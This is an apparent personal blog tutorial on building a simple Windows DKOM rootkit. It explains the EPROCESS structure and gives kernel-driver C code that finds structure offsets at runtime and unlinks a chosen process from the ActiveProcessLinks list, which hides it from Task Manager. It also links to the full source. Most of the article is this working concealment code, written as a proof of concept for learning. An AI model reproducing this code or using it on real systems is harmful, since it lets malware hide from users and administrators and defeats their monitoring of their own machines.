<-- home

A Basic Windows DKOM Rootkit

This article's purpose is to outline the creation of a simple windows Direct Kernel Object Manipulation (DKOM) rootkit. While the underlying concepts can be simple, it took me a little while to figure out how to interact with some of the more obscure windows structures and actually implement a working proof of concept. Hopefully this article helps out the next amateur.

All source code is located on github: Hide Process. Here is a screenshot demonstrating the result, hiding the notepad.exe process (tested on 32 bit Windows 7):

Background: The EPROCESS Linked List

Windows Task Manager uses a doubly linked list of Executive Process (EPROCESS) structures to help track currently executing processes. The EPROCESS blocks reside in System address space (Kernel land) and contain a great deal of information about a process. The block also contains references to a number of related structures also used by the operating system internally; the KPROCESS block, the KTHREAD blocks, and all of the ETHREAD blocks that represent the one or more threads that make up each process.

The EPROCESS block is laid out in memory like so (offsets are OS version and architechture dependent, output below is from 32 bit Win 7):

kd> dt _eprocess
nt!_EPROCESS
   +0x000 Pcb              : _KPROCESS
   +0x098 ProcessLock      : _EX_PUSH_LOCK
   +0x0a0 CreateTime       : _LARGE_INTEGER
   +0x0a8 ExitTime         : _LARGE_INTEGER
   +0x0b0 RundownProtect   : _EX_RUNDOWN_REF
   +0x0b4 UniqueProcessId  : Ptr32 Void
   +0x0b8 ActiveProcessLinks : _LIST_ENTRY
   +0x0c0 ProcessQuotaUsage : [2] Uint4B
   +0x0c8 ProcessQuotaPeak : [2] Uint4B
   +0x0d0 CommitCharge     : Uint4B
   +0x0d4 QuotaBlock       : Ptr32 _EPROCESS_QUOTA_BLOCK
   +0x0d8 CpuQuotaBlock    : Ptr32 _PS_CPU_QUOTA_BLOCK
   +0x0dc PeakVirtualSize  : Uint4B
   +0x0e0 VirtualSize      : Uint4B
   +0x0e4 SessionProcessLinks : _LIST_ENTRY
   +0x0ec DebugPort        : Ptr32 Void
   +0x0f0 ExceptionPortData : Ptr32 Void
   +0x0f0 ExceptionPortValue : Uint4B
   +0x0f0 ExceptionPortState : Pos 0, 3 Bits
   +0x0f4 ObjectTable      : Ptr32 _HANDLE_TABLE
   +0x0f8 Token            : _EX_FAST_REF
   +0x0fc WorkingSetPage   : Uint4B
   +0x100 AddressCreationLock : _EX_PUSH_LOCK
   +0x104 RotateInProgress : Ptr32 _ETHREAD
   +0x108 ForkInProgress   : Ptr32 _ETHREAD
   +0x10c HardwareTrigger  : Uint4B
   +0x110 PhysicalVadRoot  : Ptr32 _MM_AVL_TABLE
   +0x114 CloneRoot        : Ptr32 Void
   +0x118 NumberOfPrivatePages : Uint4B
   +0x11c NumberOfLockedPages : Uint4B
   +0x120 Win32Process     : Ptr32 Void
   ...
   ... continue (very large structure)

The ActiveProcessLinks field is the structure we're interested in most. It's a pointer to the _LIST_ENTRY structure for this process, which contains pointers to the processes immediately before (BLINK) and immediately after (FLINK) this one in the list.

typedef struct _LIST_ENTRY {

  struct _LIST_ENTRY *FLink;
  struct _LIST_ENTRY *BLink;

} LIST_ENTRY, *PLIST_ENTRY;

The image below is a good visualization of how the doubly linked list works. Each EPROCESS block contains a _LIST_ENTRY structure that integrates it into the list:

Theory: Removing oneself from the list.

At Blackhat in 2004 Jamie Butler, Author of 'Rootkits: Subverting the Windows Kernel' described how a process could simply remove itself from the doubly linked list and still continue execution. So how is this possible? Turns out that while the Task Manager tracks processes, the kernel and the operating system manage execution via threads. So you can remove an EPROCESS block from the ActiveProcessLinks _LIST_ENTRY list and the kernel will still manage and execute the threads (ETHREAD and KTHREAD structures) that make up the process.

So to hide our process we basically just need to remove the Nth item from a doubly linked list. Aka re-write the pointers in surrounding entries to point to one another, thus skipping over the Nth entry. (Excuse my lack of paint skills)

A quick example in C (we don't check if the item is at the end of the list because the ActiveProcessLinks list is circular on Windows):

//this method removes a node from the position index
void remove(int index)
{
  // Get a pointer to the start of the list somehow 
  myList *PreviousEntry = start;

  // Initialize easy to read variables
  myList *CurrentEntry = NULL;
  myList *NextEntry = NULL;

  int i = 1;

  // Iterate until you arrive at N-1   
  while(i<(index-1)) {
    PreviousEntry = PreviousEntry->next;
    i++;
  }

  // Set pointers to work with
  CurrentEntry = PreviousEntry->next;
  NextEntry = CurrentEntry->next;


  // Set the previous entry's fwd pointer
  PreviousEntry->next = CurrentEntry->next;

  // Set the next entry's reverse pointer
  NextEntry->previous = CurrentEntry->previous;

  return;
}

However iterating over the ActiveProcessLinks list isn't as simple as counting to N-1, we'll have to compare the PID of each process we iterate over with the one we're looking for. If there's a match, then we'll enter our HideProcess routine.

Implementation: The Hunt for an ActiveProcessLinks Pointer

So we know that we have to iterate over the ActiveProcessLinks list on Windows looking for the process name/PID of our target process. But we still haven't determined how to find the ActiveProcessLinks list in the first place. We know that each process has a LIST_ENTRY in the list at some offset in the EPROCESS block. So obtaining a pointer to the EPROCESS block of our calling process is a good starting point. Luckily for us there is a kernel mode routine called PsGetCurrentProcess, that returns a pointer to the EPROCESS block.

PEPROCESS PsGetCurrentProcess();

The routine itself backtracks from the ETHREAD pointer of the current calling thread to get to the EPROCESS block of the calling process. Which is what Jamie Butler illustrates in his slides:



The slides illustrate the relationship between each structure; once we have an ETHREAD pointer we can proceed to the ApcState field in the KTHREAD structure, then finally to the EPROCESS block. And this is exactly what the routine PsGetCurrentProcess does! Looking closer at actual instructions it performs:

kd> uf nt!PsGetCurrentProcess
nt!PsGetCurrentProcess:
828bc13c 64a124010000    mov     eax,dword ptr fs:[00000124h]
828bc142 8b4050          mov     eax,dword ptr [eax+50h]
828bc145 c3              ret

The routine gets a memory address for the current ETHREAD, places it in the EAX register, then adds 0x50 bytes to it. Therefore our EPROCESS block must be at fs:[00000174H] aka 372 bytes past the FS segment register. Note that on x64, the GS register holds the Thread Information Block instead of the FS register.

Implementation: Don't hardcode your offsets

After obtaining an EPROCESS pointer, we'll need to discover the PID of the process we're currently iterating over. Looking back at the EPROCESS structure we can see the 6th field at +0x0b4 is the UniqueProcessID:

+0x0b4 UniqueProcessId  : Ptr32 Void

But ideally we don't want to hardcode our offsets, since they're OS version dependent and we'd like our rootkit to be portable accross more than one OS/Architecture. If we select a process, and iterate over the fields in its _EPROCESS structure we can compare each field to the PID (ULONG) and possibly discover the offset. We'll use 3 different processes to average our results and ensure finding the PID in memory at that location wasn't a fluke.

ULONG find_eprocess_pid_offset() {


  ULONG pid_ofs = 0;    // The offset we're looking for
  int idx = 0;          // Index 
  ULONG pids[3];        // List of PIDs for our 3 processes
  PEPROCESS eprocs[3];  // Process list, will contain 3 processes


  //Select 3 process PIDs and get their EPROCESS Pointer
  for (int i = 16; idx<3; i += 4)
  {
    if (NT_SUCCESS(PsLookupProcessByProcessId((HANDLE)i, &eprocs[idx])))
    {
      pids[idx] = i;
      idx++;
    }
  }

  
  /*
  Go through the EPROCESS structure and look for the PID
  we can start at 0x20 because UniqueProcessId should
  not be in the first 0x20 bytes,
  also we should stop after 0x200 bytes with no success
  */

  for (int i = 0x20; i<0x200; i += 4)
  {
    if ((*(ULONG *)((UCHAR *)eprocs[0] + i) == pids[0])
      && (*(ULONG *)((UCHAR *)eprocs[1] + i) == pids[1])
      && (*(ULONG *)((UCHAR *)eprocs[2] + i) == pids[2]))
    {
      pid_ofs = i;
      break;
    }
  }

  ObDereferenceObject(eprocs[0]);
  ObDereferenceObject(eprocs[1]);
  ObDereferenceObject(eprocs[2]);


  return pid_ofs;
} 

Luckily once we know the PID offset, it's easy enough to obtain the ActiveProcessLinks offset. Since we know ActiveProcessLinks is the next field in the structure we simply need to add 4 bytes (Int32) or 8 bytes (Int64) depending on the system architecture. A good way to determine which architecture our driver is compiled for is checking pointer sizes. A 32 bit architecture will have 4 byte pointers, and a 64 bit architecture will have 8 byte pointers. Microsoft's INT_PTR datatype will scale to the correct size of a pointer for both 32 and 64-bit Windows:

// Get PID offset 
ULONG PID_OFFSET = find_eprocess_pid_offset();

// Initialize LIST_ENTRY offset 
ULONG LIST_OFFSET = PID_OFFSET;

// Check Architecture using pointer size
INT_PTR ptr;

// Ptr size 8 if compiled for a 64-bit machine
// 4 if compiled for 32-bit machine
LIST_OFFSET += sizeof(ptr);

Then, depending on the result, 4 or 8 bytes will be added to the PID_OFFSET to determine the LIST_ENTRY offset.

Implementation: Show me the code

Now let's take our Nth item removal concept from the theory section and implement it for EPROCESS blocks.

// Here we go!

PCHAR modifyTaskList(UINT32 pid) {


  LPSTR result = ExAllocatePool(NonPagedPool, sizeof(ULONG) + 20);;


  // Get PID offset nt!_EPROCESS.UniqueProcessId
  ULONG PID_OFFSET = find_eprocess_pid_offset();

  // Check if offset discovery was successful 
  if (PID_OFFSET == 0) {
    return (PCHAR)"Could not find PID offset!";
  }
  
  // Get LIST_ENTRY offset nt!_EPROCESS.ActiveProcessLinks
  ULONG LIST_OFFSET = PID_OFFSET;


  // Check Architecture using pointer size
  INT_PTR ptr;

  // Ptr size 8 if compiled for a 64-bit machine, 4 if compiled for 32-bit machine
  LIST_OFFSET += sizeof(ptr);

  // Record offsets for usermode buffer
  sprintf_s(result, 2 * sizeof(ULONG) + 30, "Found offsets: %lu & %lu", PID_OFFSET, LIST_OFFSET);

  // Get current process
  PEPROCESS CurrentEPROCESS = PsGetCurrentProcess();

  // Initialize other variables
  PLIST_ENTRY CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);
  PUINT32 CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);

  // Check self 
  if (*(UINT32 *)CurrentPID == pid) {
    remove_links(CurrentList);
    return (PCHAR)result;
  }
  
  // Record the starting position
  PEPROCESS StartProcess = CurrentEPROCESS;
  
  // Move to next item
  CurrentEPROCESS = (PEPROCESS)((ULONG_PTR)CurrentList->Flink - LIST_OFFSET);
  CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);
  CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);

  // Loop until we find the right process to remove
  // Or until we circle back
  while ((ULONG_PTR)StartProcess != (ULONG_PTR)CurrentEPROCESS) {

    // Check item
    if (*(UINT32 *)CurrentPID == pid) {
      remove_links(CurrentList);
      return (PCHAR)result;
    } 

    // Move to next item
    CurrentEPROCESS = (PEPROCESS)((ULONG_PTR)CurrentList->Flink - LIST_OFFSET);
    CurrentPID = (PUINT32)((ULONG_PTR)CurrentEPROCESS + PID_OFFSET);
    CurrentList = (PLIST_ENTRY)((ULONG_PTR)CurrentEPROCESS + LIST_OFFSET);
  } 

  return (PCHAR)result; 
}

And finally the actual removal:

void remove_links(PLIST_ENTRY Current) {

  PLIST_ENTRY Previous, Next;

  Previous = (Current->Blink);
  Next = (Current->Flink);

  // Loop over self (connect previous with next)
  Previous->Flink = Next;
  Next->Blink = Previous;

  // Re-write the current LIST_ENTRY to point to itself (avoiding BSOD)
  Current->Blink = (PLIST_ENTRY)&Current->Flink;
  Current->Flink = (PLIST_ENTRY)&Current->Flink;

  return;
  
}

That's all! Hope it was somewhat informative.


References:

Blackhat 2004 - Jamie Butler

Wikipedia: Direct Kernel Object Manipulation